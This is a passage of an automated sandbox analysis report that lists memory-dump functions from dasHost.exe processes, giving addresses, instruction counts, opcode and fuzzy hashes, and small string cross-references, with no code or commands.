Opcode Fuzzy Hash: 7fb02d640debd3029d67cf48d1d453f2fe7ae4c5bf8c9685449cca4ed9e6457e
Instruction Fuzzy Hash: 7D01A470D0D78E8FEB58EF64985A2B97BA0FF55341F5005BEE808C2191DB769454C744

Function 00007FF848E87679 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd73e4f48a4a45c39e37da67ebdaa1f3d4538d5227b2517258c12fe9bbb2073
Instruction ID: ea45a64f6bc8537dbc486358b5721be0dbea31c0b0e73fa220fefbc9fe567e8a
Opcode Fuzzy Hash: 3cd73e4f48a4a45c39e37da67ebdaa1f3d4538d5227b2517258c12fe9bbb2073
Instruction Fuzzy Hash: 03017C30D5D68A9FE752BB3888492AD7BE0FF5A381F9605F6D018C70A2EF38A4448715

Function 00007FF848E80F70 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be66cc1c94bee873c9b91464e71924c6968a960e645e4a14d7e948beb49bbf1
Instruction ID: edbb0765b6c6b9684169002a137a12491a4bf97bab34f8262b2d52fc0afa67d1
Opcode Fuzzy Hash: 3be66cc1c94bee873c9b91464e71924c6968a960e645e4a14d7e948beb49bbf1
Instruction Fuzzy Hash: 83011630918A0E9EEB88FF68C4586BEB7E1FF18345F50487AD81AD3191DF35A590CB54

Function 00007FF848E72F49 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2015e0ca7873b87e0840e043eb668ebc60266c9e4aef1c75afd98f79700bdc8a
Instruction ID: f372cf6e95a497f229145f0447f3403324d6c3edff59767ae0e70da4a6f9178d
Opcode Fuzzy Hash: 2015e0ca7873b87e0840e043eb668ebc60266c9e4aef1c75afd98f79700bdc8a
Instruction Fuzzy Hash: DC019A3090D6894FE756FB3488486A97BF0FF5A340F0605F2D40ACA0ABEA38A4448301

Function 00007FF848E80F51 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef8a8753d3e6d82481628fea8f00766f9ebc9e09fbee6daef0acffaf14dc0d6b
Instruction ID: 74e97e10ba60104b0339f58532e4733f4aa8da5f1ed001f29dc6d71145688c0a
Opcode Fuzzy Hash: ef8a8753d3e6d82481628fea8f00766f9ebc9e09fbee6daef0acffaf14dc0d6b
Instruction Fuzzy Hash: 0CF03774D0DA8E8FEB94FF2888592FE7BA0FF55242F81057AE818C21A1EB349554CB54

Function 00007FF848E728AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee3e4becf1c5ccbcffd208659d8d80a2dbc45e4d4a3805530dc3152f6797f9f
Instruction ID: f17ad4539ca547e6aadfeb5f42e6b1d65a5f4193dcc57023adb109ef36a13d9a
Opcode Fuzzy Hash: eee3e4becf1c5ccbcffd208659d8d80a2dbc45e4d4a3805530dc3152f6797f9f
Instruction Fuzzy Hash: B6018B30D5D64E9FE751FB6488486B97BF0FF5A340F0149B6D409C70A2EF38A5948715

Function 00007FF848E82CAA Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65df14553aed15ebd67760018505237993a2d1e02527e9112bb542c0c6ca9d3
Instruction ID: 2577bea81d55a6925892a42a128eb7e916bb72733d09b841962da49896ecefe7
Opcode Fuzzy Hash: e65df14553aed15ebd67760018505237993a2d1e02527e9112bb542c0c6ca9d3
Instruction Fuzzy Hash: 3D013571D0C50A9FEB58EFA8C4415FCBBF1FB48391F90003AD00AA7296DB3829408B18

Function 00007FF848E7AC29 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5359f0fe14846d85de59eb3772db46fc0a56eeb3d4cbf4320a96d5d2ef64d3c1
Instruction ID: 8eaacb7689aa6b8fa3070a202a57aa3a3ac4d600783c15de62be7dadce54aa79
Opcode Fuzzy Hash: 5359f0fe14846d85de59eb3772db46fc0a56eeb3d4cbf4320a96d5d2ef64d3c1
Instruction Fuzzy Hash: 94018F3594D6896FE752FB3488991A97BF0FF1A340F0509F7D408CB0A2EF38A4849701

Function 00007FF848E70608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a40870f52e71f13bf607db79ae076d3ba966270b9baa415e4c37ce2f6019ea4
Instruction ID: 9200b398a403583d0728a6b8059c0343cadd78907314889bb8b026428a4bf25b
Opcode Fuzzy Hash: 3a40870f52e71f13bf607db79ae076d3ba966270b9baa415e4c37ce2f6019ea4
Instruction Fuzzy Hash: 1B01463091890E9EEB59EB2484492B972A0FF18345F1008BEE40AC6192DF3AA150C654

Function 00007FF848E70610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea7aed99e20777b32d3c9f69db118b666a5f22b81fbe7644b2f8fdd95af53ac
Instruction ID: 6742a810346c06ba7a83cf44e783eaa2b332f918b985330539483c7a83414411
Opcode Fuzzy Hash: 2ea7aed99e20777b32d3c9f69db118b666a5f22b81fbe7644b2f8fdd95af53ac
Instruction Fuzzy Hash: 83016930919A0E9EFB48FB6484492B973A0FF19345F1008BEE41FC21D2DF3AA550C604

Function 00007FF848E71140 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0993504507539f5912690189fdaa7a0ae1748bb067265ceabc4abbb50325107
Instruction ID: 343277327636cf5ea07120c3b21fde046ecff9302b7c7cb12d56482cfd4d90dd
Opcode Fuzzy Hash: c0993504507539f5912690189fdaa7a0ae1748bb067265ceabc4abbb50325107
Instruction Fuzzy Hash: 18F0AF70D1CA1E8EFB98AA6898183FA77F0FF563A1F0001BAD419C60C1DF3511148645

Function 00007FF848E7ACA8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd25da53d9e2a282bf4ef066c86826ff4921fd8743c5a699c5b63d0472633e0
Instruction ID: 7e90087cab7eee49965e9c8864ca2580b32caf197897611ad500c50deb15af82
Opcode Fuzzy Hash: 4bd25da53d9e2a282bf4ef066c86826ff4921fd8743c5a699c5b63d0472633e0
Instruction Fuzzy Hash: FBF09036A4D51A7FD311F61CE8914FA73A0FF80365B088BB3D04DC7057EE29A04846A8

Function 00007FF848E7AD40 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4afa9c2c72ec4cffa6acef771bd320cd3e7bb91998ec2eec6bfe0134c1f75bd0
Instruction ID: 98239485fbd8539244e84cc47397e77924d51b3f2c951a4ced3dbcfcf8355dd6
Opcode Fuzzy Hash: 4afa9c2c72ec4cffa6acef771bd320cd3e7bb91998ec2eec6bfe0134c1f75bd0
Instruction Fuzzy Hash: 5DF08C3099950EAFEB48FB24C8986BE76A0FF0C389F9004BED41ED3191DF35A250C644

Function 00007FF848E7ACF8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61831ad927b363d33e202466ab2678d58325f500eb74019ea011b6b2cd44a9ca
Instruction ID: 61f029d24f76501d529baf850a4c5a145c21988b411bb84a7fb1ab868d427225
Opcode Fuzzy Hash: 61831ad927b363d33e202466ab2678d58325f500eb74019ea011b6b2cd44a9ca
Instruction Fuzzy Hash: 8DF0873096850E9EEB98FB24C4486BE76A0FF08384F9008BAE80ED3182DF35A550C664

Function 00007FF848E705D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b05ccdcc7b96a706be43685e7326ba03c100c194fe5fec29f43994597120d47
Instruction ID: dfd30d46baf9da08c80bcc7e44aa50104d11237ab8650ccaa81367cc01d49888
Opcode Fuzzy Hash: 9b05ccdcc7b96a706be43685e7326ba03c100c194fe5fec29f43994597120d47
Instruction Fuzzy Hash: 8DF0CD3091DA4E9FEB48EEA494062FA77A0FF05385F10047AE80DC2181CB36A460CB88

Function 00007FF848E727C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9b05c5dfd075f99cb00277b051f53b8744e805a30487135f2c8be7d49702584
Instruction ID: 5c4e642ccd17ebc65b4c6555c433acf141ffd2d9e2fe6c7f9c5070838b06d268
Opcode Fuzzy Hash: d9b05c5dfd075f99cb00277b051f53b8744e805a30487135f2c8be7d49702584
Instruction Fuzzy Hash: 16F04F3180E7898FFB6AAF2488191A93BB0FF06241F4505BAD40ACA1D3DB399854C751

Function 00007FF848E87C29 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49ce129e1f7d210ab0f3e37566f2e1d05b0d72780e6ee9ccd7937187bc0d2bf5
Instruction ID: c0f53d75cbf2614ebef04940d365102b6ee4e7b0879c6fc7f75895e53b32cde8
Opcode Fuzzy Hash: 49ce129e1f7d210ab0f3e37566f2e1d05b0d72780e6ee9ccd7937187bc0d2bf5
Instruction Fuzzy Hash: AAF06D3085E78A9FEB55AB248C652AD3BA0BF0A641F8515FBD808C71E2DB389554C741

Function 00007FF848E7283D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3599162d824c5116d18d4ee2b7f3183b92bfee439e1809882eca5f42e86c46
Instruction ID: 86dd7ede690565937206238ef834a9319b7e514c3cb7baa9f23ad6824842f83c
Opcode Fuzzy Hash: aa3599162d824c5116d18d4ee2b7f3183b92bfee439e1809882eca5f42e86c46
Instruction Fuzzy Hash: 58F0B43091E6898FFB59AF2484592B93BA0FF16341F4505BED80AC61D2DB399450C700

Function 00007FF848E70605 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85dac32bf85141d25b5c60d8cb78f073b9237291e266e4b5f1d6914bafb16a9
Instruction ID: 03c5fd81c7f4e84d184936e6d38ec181dd8d3fced9bf6fbc1cd3636be6dc668d
Opcode Fuzzy Hash: a85dac32bf85141d25b5c60d8cb78f073b9237291e266e4b5f1d6914bafb16a9
Instruction Fuzzy Hash: E2F0ED3091D60E8FFB68AF2488092FE33A0FF05385F00183AE80EC10C2DF39A060C644

Function 00007FF848E81AE1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a947a4afbc336c3fcbf3ef9741b83b781f5d159aea0351a8fe8fc92c730e6d72
Instruction ID: 108eb5888289a8e1611c5e2dd04b2b35ddf2f2e429effbfc3f655ff47e3f2b27
Opcode Fuzzy Hash: a947a4afbc336c3fcbf3ef9741b83b781f5d159aea0351a8fe8fc92c730e6d72
Instruction Fuzzy Hash: 8FF05830D09309CFEB15EF94C9507EDB3F1FB10341F540266C0099B294DB79AA84DB48

Function 00007FF848E82C7D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction ID: 14264d3aa7965864db9b45393582d5ad4d078ce2e8723976eef7f4aad9bc21cc
Opcode Fuzzy Hash: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction Fuzzy Hash: B0F0D4319086098FEB54FB94C485AFCB3E1FB58340F60017AC00AE7292CF3869408B44

Function 00007FF848E81649 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85c5c948dd29ae263d44ff7f7292cb586a8a18562aa7d4cd31da42c4b4435c69
Instruction ID: eec98d497d4424d9f520db374223b4ad0daf546ee12e66f51cad7d32163b8cd1
Opcode Fuzzy Hash: 85c5c948dd29ae263d44ff7f7292cb586a8a18562aa7d4cd31da42c4b4435c69
Instruction Fuzzy Hash: 1CE09A30A0930DCFEB14EF54C9506ED73F1FB54301F140266C009DB294EB78AA40CB84

Function 00007FF848E854FB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78982632196348643d99b138587f5dce21302dfdc4ff9003fa7e19019fd997c4
Instruction ID: f3cf1358c579bc62615962a29f2b7b071379c02302f4bc14cdd0ce08d713a9ed
Opcode Fuzzy Hash: 78982632196348643d99b138587f5dce21302dfdc4ff9003fa7e19019fd997c4
Instruction Fuzzy Hash: 23D01271D5CE198FE788FF18948D3BCBBE1FB54680F80442AC408D3181DF3054015754

Non-executed Functions

Function 00007FF848E814B4 Relevance: 6.3, Strings: 5, Instructions: 76COMMON

Download Yara Rule

Strings

+, xrefs: 00007FF848E811EE
, xrefs: 00007FF848E814E6
/, xrefs: 00007FF848E81B03
., xrefs: 00007FF848E81531
{, xrefs: 00007FF848E811E1

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: $+$.$/${
API String ID: 0-483143972
Opcode ID: 390d2ec86b3e1a1ab3d21f0daad9c7daaa5fcdd33ae551a859a101f7b42b684f
Instruction ID: f83c2e94cd0b5ab641b3a38e6b02c2389f9c6602e574ea58abc3111a252ce8fe
Opcode Fuzzy Hash: 390d2ec86b3e1a1ab3d21f0daad9c7daaa5fcdd33ae551a859a101f7b42b684f
Instruction Fuzzy Hash: 1E31B170D0822A8FEB68DF54C9547EDB7F1BF48341F5044BAC00AAB280DB7A5A84CF58

Function 00007FF848E7E80A Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

Z, xrefs: 00007FF848E7E818
-, xrefs: 00007FF848E7E863
6, xrefs: 00007FF848E7E8A6
., xrefs: 00007FF848E7E8CC
N, xrefs: 00007FF848E7E906

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: -$.$6$N$Z
API String ID: 0-3931608286
Opcode ID: 8bee794a30080a60d940e499c5b621d666880747aaa0d5160ce26f3ca03451d7
Instruction ID: 06be601ae2a6ced0e804b89a1f44e31c9ea146219b8321bd12918d32ba0b1d54
Opcode Fuzzy Hash: 8bee794a30080a60d940e499c5b621d666880747aaa0d5160ce26f3ca03451d7
Instruction Fuzzy Hash: 80319270D0862A8FEBA4EB18C888BAAB7F1FB14345F0041E9D41DE6255DB34AA80CF45

Function 00007FF848E7F6C5 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

], xrefs: 00007FF848E7F6FC
B, xrefs: 00007FF848E7F76F
M, xrefs: 00007FF848E7F731
[, xrefs: 00007FF848E7F766

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: B$M$[$]
API String ID: 0-3643626785
Opcode ID: c19652dad4910be1230ecceab07fa445a0969f8fea00c8a9b474db7a5fb34cbb
Instruction ID: 93fc9a513dd06249ac0eb4d8dbd4897aaaba0c2eda62eccdeca54956648500bd
Opcode Fuzzy Hash: c19652dad4910be1230ecceab07fa445a0969f8fea00c8a9b474db7a5fb34cbb
Instruction Fuzzy Hash: 1231F470D1962A8FEB68EF14C8947EEB7B1BB55741F0080AAD40D97281DF386A84CF84

Function 00007FF848E7E951 Relevance: 5.1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

Strings

^, xrefs: 00007FF848E8044C
k, xrefs: 00007FF848E7E74E
{, xrefs: 00007FF848E7E965
;, xrefs: 00007FF848E803F8

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: ;$^$k${
API String ID: 0-1912294886
Opcode ID: eae880921b9feb4367902a04a9c84ec7fced3aecc3e28f83fe0ab91b6684a82f
Instruction ID: 18c1f5c533b15c40f1eb72b2aa1d43a348cf14c1683a66a83406f6902f21bb70
Opcode Fuzzy Hash: eae880921b9feb4367902a04a9c84ec7fced3aecc3e28f83fe0ab91b6684a82f
Instruction Fuzzy Hash: 5721E570D0862A8FEBA4EF14C8447AAB6B1BB15341F0041FAD84D96285DB385AC4CF45

Analysis Process: dasHost.exePID: 6448, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E9F0A6 Relevance: 7.6, Strings: 6, Instructions: 97COMMON

Download Yara Rule

Strings

\, xrefs: 00007FF848E9F0BB
8, xrefs: 00007FF848E9F633
%, xrefs: 00007FF848E9F971
Y, xrefs: 00007FF848E9F949
k, xrefs: 00007FF848E9FF0D
_, xrefs: 00007FF848E9F0C8

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9f000_dasHost.jbxd

Similarity

API ID:
String ID: %$8$Y$\$_$k
API String ID: 0-2256862889
Opcode ID: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction ID: ec71408450e4c4a955b196023962e2926a3b77f89010d4d53dcd6f2720ff4780
Opcode Fuzzy Hash: c17aba2d4533d96f20c33c453070d90bca6627168075a1e48ad2de3b24581cd7
Instruction Fuzzy Hash: BB41A4B0D0866ACFEB68EF54C8547EDB7B1BB54345F1041EAD40DA6281CBB81AC4CF54

Function 00007FF848E906C0 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848E90839

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: c79ddb86917b740e2be6160cae7f07170267d6179618264e1c3909136f22a40c
Instruction ID: 0c191cc5427fe1386d7e899c15715f15bc8bba9f630893d2cc222a1ad4ba4a30
Opcode Fuzzy Hash: c79ddb86917b740e2be6160cae7f07170267d6179618264e1c3909136f22a40c
Instruction Fuzzy Hash: E1614A52E0EAC24FE365B6BC68051B93BD0FF523E4F4941F7C0588709BDE789845878A

Function 00007FF848E90805 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848E90839

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 49e8ec499f351e6d7fa6a90bf601fbb7235bc7e24331100390ecf729e3d9f629
Instruction ID: 3226268fbdf488ef29e82d64aa0a605f8ee439a211a3a124640ad54f73cd655a
Opcode Fuzzy Hash: 49e8ec499f351e6d7fa6a90bf601fbb7235bc7e24331100390ecf729e3d9f629
Instruction Fuzzy Hash: 56216E62E0DA829FE314B6BCA85A1F977D0FF11399F4D4073D048C9043EE645086C2D5

Function 00007FF848E9FC9E Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

'V_H, xrefs: 00007FF848E9FCCF

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E9F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e9f000_dasHost.jbxd

Similarity

API ID:
String ID: 'V_H
API String ID: 0-833917600
Opcode ID: f8b0df87940759cd75a5799117c51eda6ed6f3212036c6669e69e13bf2aab4d4
Instruction ID: 68783a296d573b0158c2d060d262444e520dbd4f33d79bb5c3c523c4500b9d82
Opcode Fuzzy Hash: f8b0df87940759cd75a5799117c51eda6ed6f3212036c6669e69e13bf2aab4d4
Instruction Fuzzy Hash: 352129B0D18A599FDBA8EF2888557A8B7F1FF14345F4040FAC50DE3282DE742A808F19

Function 00007FF848E90C78 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

3, xrefs: 00007FF848E90C78

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848e90000_dasHost.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: 34e9b312a35f6a8c7132a42f01e9f30f426406872e76f6b881fe576cdd4baa1b
Instruction ID: 9f44179e084d4f0751320dd400ef2f53c3b23a44f404131f1243844fbce6afde
Opcode Fuzzy Hash: 34e9b312a35f6a8c7132a42f01e9f30f426406872e76f6b881fe576cdd4baa1b
Instruction Fuzzy Hash: 3901FB75D0C35ACEEB11BBD0C4456BDBBB0AB51349F94017AD1096A2C2CBB86689CB85

Function 00007FF848EA1AE1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848EA1AA5

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: d7ced0e145a74a3fd562e433ec19e5b99d23db68737c9d90877b8172b7869c0c
Instruction ID: 53367b53cab6d091df157e659bc12daee672f0d6572139d423ba11309f6e6f77
Opcode Fuzzy Hash: d7ced0e145a74a3fd562e433ec19e5b99d23db68737c9d90877b8172b7869c0c
Instruction Fuzzy Hash: FBF05870D09719CFEB15EF94D9507EDB3F0FB50741F180226C01A9B294DB79AA84CB48

Function 00007FF848EA1649 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848EA1AA5

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a604bf27e4675a40599a1637960354976821c2b674d788ffd60edaa8d4ad8b80
Instruction ID: 4c24090c6cc17501ca434829b9d31b5979b870a4c5c955c4dabba9025f63c902
Opcode Fuzzy Hash: a604bf27e4675a40599a1637960354976821c2b674d788ffd60edaa8d4ad8b80
Instruction Fuzzy Hash: 41E09A30A0970DCFEB14EF94C9506ED73F0FB54701F140226C00ADB294EB78AA40CB84

Function 00007FF848EA3415 Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2228095487.00007FF848EA1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848ea1000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379ece2e34afa531040750cc2cfd508a667ea4ae6eb403d7ec7b8ef9d017defd
Instruction ID: 06f6248c5e131463eb34779cc9b3beba1c63cdb803cd28e17bce967514774fe2
